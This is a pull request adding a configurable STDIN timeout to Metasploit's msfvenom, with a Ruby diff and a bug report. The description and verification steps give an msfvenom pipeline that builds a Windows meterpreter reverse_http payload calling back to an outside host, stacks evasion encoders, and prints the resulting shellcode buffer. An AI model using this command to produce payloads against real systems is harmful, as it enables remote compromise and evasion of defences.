### PR TITLE
Add Msfvenom timeout

### DIFF
--- a/msfvenom
+++ b/msfvenom
@@ -168,7 +168,7 @@ def parse_args(args)
   end
 
   opt.on('-t', '--timeout       <second>', Integer, "The number of seconds to timeout when reading payload from STDIN (30s as default).") do |x|
-    opts[:timeout] = x || 30
+    opts[:timeout] = x
   end
 
 
@@ -206,6 +206,7 @@ def parse_args(args)
   if opts[:payload] == 'stdin' and not opts[:list]
     $stderr.puts "Attempting to read payload from STDIN..."
     begin
+      opts[:timeout] ||= 30
       ::Timeout.timeout(opts[:timeout]) do
         opts[:stdin] = payload_stdin
       end

--- a/msfvenom
+++ b/msfvenom
@@ -167,6 +167,11 @@ def parse_args(args)
     opts[:smallest] = true
   end
 
+  opt.on('-t', '--timeout       <second>', Integer, "The number of seconds to timeout when reading payload from STDIN (30s as default).") do |x|
+    opts[:timeout] = x || 30
+  end
+
+
   opt.on_tail('-h', '--help', 'Show this message') do
     raise HelpError, "#{opt}"
   end
@@ -201,7 +206,7 @@ def parse_args(args)
   if opts[:payload] == 'stdin' and not opts[:list]
     $stderr.puts "Attempting to read payload from STDIN..."
     begin
-      ::Timeout.timeout(30) do
+      ::Timeout.timeout(opts[:timeout]) do
         opts[:stdin] = payload_stdin
       end
     rescue Timeout::Error


### PR DESCRIPTION
Today I want to encode a payload with multi encoders like below: 

`msfvenom -p windows/meterpreter/reverse_http  lhost=8.8.8.8  lport=5555  -f raw -e x86/shikata_ga_nai -i 20 |msfvenom -e x86/call4_dwoord_xor -a x86 --platform windows -f raw -i 4 |msfvenom -e x86/call4_dword_xor -a x86 --platform windows -f c -i 4`

Unfortunaltily it couldn't give me a right return value.  

The output like this : 

```
Attempting to read payload from STDIN...
Attempting to read payload from STDIN...
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 419 (iteration=0)
x86/shikata_ga_nai chosen with final size 419
Payload size: 419 bytes

Found 1 compatible encoders
Attempting to encode payload with 4 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 444 (iteration=0)
x86/call4_dword_xor succeeded with size 468 (iteration=1)
x86/call4_dword_xor succeeded with size 492 (iteration=2)
x86/call4_dword_xor succeeded with size 516 (iteration=3)
x86/call4_dword_xor chosen with final size 516
Payload size: 516 bytes

Found 1 compatible encoders
Attempting to encode payload with 4 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 24 (iteration=0)
x86/call4_dword_xor succeeded with size 48 (iteration=1)
x86/call4_dword_xor succeeded with size 72 (iteration=2)
x86/call4_dword_xor succeeded with size 96 (iteration=3)
x86/call4_dword_xor chosen with final size 96
Payload size: 96 bytes
Final size of c file: 429 bytes
unsigned char buf[] =
"\x2b\xc9\x83\xe9\xee\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x5d\x3e\xd3\xce\x83\xee\xfc\xe2\xf4\x6e\xf7\x50\x27\xa9\xd6"
"\x2c\x31\xa2\xc1\x13\x90\xdc\x48\xdd\xf0\x18\x69\x1e\x4d\xb3"
"\xc2\x31\x3a\x52\xb2\x07\xea\x99\x93\x7b\xfc\x9c\x84\x44\x5d"
"\xe2\x0d\x8a\xf7\x12\x6d\xb7\x80\x8d\x87\x66\xf7\xbc\xc3\x11"
"\xd9\x97\xe2\x6d\xcf\x68\xf5\x52\x6e\x16\x7c\x9c\x88\x5d\x6a"
"\x49\xb3\x79\xf6\x70\xc4";
```

The weird thing is the same command on kali run correctly. Wasted of much time to find the reason.

And I found out it, all of this was the timeout value, set default to 30, when I have a long chain command to cost a lot of time, it would fail for sure. 

```
    begin
      ::Timeout.timeout(30) do
        opts[:stdin] = payload_stdin
      end
    rescue Timeout::Error
      opts[:stdin] = ''
    end
```
So I add a option to control the timeout value to advoid it.
BTW, `msfvenom` run slower on windows than linux.(Feel sorry for my poor PC)

## Verification

List the steps needed to make sure this thing works

- [ ] `msfvenom -p windows/meterpreter/reverse_http  lhost=8.8.8.8  lport=5555  -f raw -e x86/shikata_ga_nai -i 30 |msfvenom -e x86/call4_dwoord_xor -a x86 --platform windows -f raw -i 4 |msfvenom -e x86/call4_dword_xor -a x86 --platform windows -f c -i 4 -t 300` 
